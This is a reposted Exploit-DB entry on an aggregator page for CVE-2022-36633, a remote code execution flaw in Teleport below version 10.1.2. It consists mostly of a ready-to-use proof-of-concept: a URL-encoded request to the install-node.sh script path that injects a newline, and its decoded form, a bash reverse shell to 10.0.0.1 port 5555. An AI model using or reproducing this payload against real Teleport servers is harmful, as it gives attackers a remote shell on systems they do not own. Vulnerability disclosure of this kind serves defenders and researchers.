18
[remote] Teleport v10.1.1 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51019
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Teleport v10.1.1 - Remote Code Execution (RCE)
Exploit:
/
# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633
Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
method=3Diam
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK